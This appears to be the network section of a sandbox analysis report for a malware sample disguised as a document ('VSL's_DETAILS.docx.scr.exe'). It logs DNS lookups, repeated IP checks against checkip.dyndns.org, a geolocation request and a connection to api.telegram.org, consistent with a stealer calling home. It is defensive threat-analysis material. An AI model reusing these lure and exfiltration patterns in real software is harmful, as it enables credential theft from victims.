Dec 17, 2024 08:33:23.020900011 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:23.021224022 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:23.025171041 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:23.145051956 CET	80	49743	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:23.145210981 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:23.145308018 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:23.265068054 CET	80	49743	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:24.243148088 CET	80	49743	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:24.296833992 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:24.359723091 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:24.359767914 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:24.359838963 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:24.363938093 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:24.363969088 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:25.581023932 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:25.582906961 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:25.582947969 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:26.024842978 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:26.025022984 CET	443	49744	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:26.025083065 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:26.025427103 CET	49744	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:26.028570890 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:26.029630899 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:26.149029016 CET	80	49743	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:26.149161100 CET	49743	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:26.149543047 CET	80	49746	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:26.149626970 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:26.149780989 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:26.269593000 CET	80	49746	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:27.247442007 CET	80	49746	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:27.249073982 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:27.249119043 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:27.249231100 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:27.249500036 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:27.249509096 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:27.296866894 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:28.465368986 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:28.497023106 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:28.497049093 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:28.910604000 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:28.910696983 CET	443	49749	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:28.910759926 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:28.911240101 CET	49749	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:28.914463997 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:28.915709019 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:29.034635067 CET	80	49746	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:29.034770966 CET	49746	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:29.035521984 CET	80	49751	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:29.035619020 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:29.035794020 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:29.155472994 CET	80	49751	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:30.130964994 CET	80	49751	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:30.134493113 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:30.134542942 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:30.134623051 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:30.134862900 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:30.134876966 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:30.187506914 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:31.357956886 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:31.366992950 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:31.367017984 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:31.814594030 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:31.814691067 CET	443	49752	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:31.814779043 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:31.815162897 CET	49752	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:31.818073988 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:31.819255114 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:31.938169003 CET	80	49751	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:31.938298941 CET	49751	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:31.939013958 CET	80	49754	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:31.939093113 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:31.939243078 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:32.058911085 CET	80	49754	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:33.048707008 CET	80	49754	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:33.050149918 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:33.050204039 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:33.050302029 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:33.050554991 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:33.050569057 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:33.093754053 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.263364077 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:34.273233891 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:34.273323059 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:34.707823992 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:34.707900047 CET	443	49755	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:34.707989931 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:34.708571911 CET	49755	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:34.712315083 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.713426113 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.832508087 CET	80	49754	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:34.832828999 CET	49754	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.833165884 CET	80	49756	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:34.833262920 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.833580017 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:34.953263998 CET	80	49756	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:36.308022022 CET	80	49756	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:36.310200930 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:36.310230970 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:36.310381889 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:36.310764074 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:36.310777903 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:36.359437943 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:37.576242924 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:37.580024004 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:37.580063105 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:38.020283937 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:38.020380020 CET	443	49757	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:38.020450115 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:38.021059036 CET	49757	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:38.034846067 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:38.155457020 CET	80	49756	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:38.155682087 CET	49756	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:38.176467896 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:38.176505089 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:38.176608086 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:38.177229881 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:38.177257061 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:39.543236017 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:39.543303013 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:39.547821999 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:39.547842979 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:39.548093081 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:39.550126076 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:39.595323086 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:40.047343016 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:40.047413111 CET	443	49758	149.154.167.220	192.168.2.4
Dec 17, 2024 08:33:40.047568083 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:40.057166100 CET	49758	443	192.168.2.4	149.154.167.220
Dec 17, 2024 08:33:45.326778889 CET	49740	80	192.168.2.4	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:33:11.054406881 CET	64910	53	192.168.2.4	1.1.1.1
Dec 17, 2024 08:33:11.193581104 CET	53	64910	1.1.1.1	192.168.2.4
Dec 17, 2024 08:33:12.929461002 CET	60046	53	192.168.2.4	1.1.1.1
Dec 17, 2024 08:33:13.066812992 CET	53	60046	1.1.1.1	192.168.2.4
Dec 17, 2024 08:33:38.035490036 CET	63397	53	192.168.2.4	1.1.1.1
Dec 17, 2024 08:33:38.175308943 CET	53	63397	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 08:33:11.054406881 CET	192.168.2.4	1.1.1.1	0x33a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:12.929461002 CET	192.168.2.4	1.1.1.1	0x24c9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:38.035490036 CET	192.168.2.4	1.1.1.1	0xc816	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:11.193581104 CET	1.1.1.1	192.168.2.4	0x33a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:13.066812992 CET	1.1.1.1	192.168.2.4	0x24c9	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:13.066812992 CET	1.1.1.1	192.168.2.4	0x24c9	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:33:38.175308943 CET	1.1.1.1	192.168.2.4	0xc816	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:11.324584007 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:12.430684090 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7e6797a1251a9de356b8a33f87fa55a2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 08:33:12.435235977 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 08:33:12.755407095 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fe84a7b12471629b7d7753ca071c9bf4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 08:33:14.839340925 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 08:33:15.463963032 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f237222f02b9eeafb93f52e8d5d9964 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:17.260054111 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 08:33:18.369180918 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 35af7c114262baccb9dc00ee04cc957a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:20.192437887 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 08:33:21.291553020 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c56b1c6d84916831056b4107a59c8c3a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:23.145308018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:24.243148088 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d11f2005d92bdd126eaee07bce71e159 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:26.149780989 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:27.247442007 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 02a4b99bbf86cb8bf32850bfa10b52af Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49751	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:29.035794020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:30.130964994 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9782da7886769a990e7ef4a1e502bc9d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:31.939243078 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:33.048707008 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 78a2326fedcb45208fcbbf3044aaec83 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	193.122.130.0	80	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:33:34.833580017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 08:33:36.308022022 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 61078adf60c09df80413fd9a1a347dad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 07:33:14 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409563 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16IBZifgkEDi%2Bya2yRM5XfieR1aY9wF0xGohri1GppQmNoOAzONYA%2B7d8hiKjdxfiPYWFB333MS%2Bsa%2FU%2FOnCHIvFROcDrcON%2BNzgWwopU5tizHGcAYgeHWUNoWQKPabmQduXOzwj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f35394eae78440d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1580&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1809169&cwnd=177&unsent_bytes=0&cid=2c31b41e7ea59b19&ts=458&x=0"
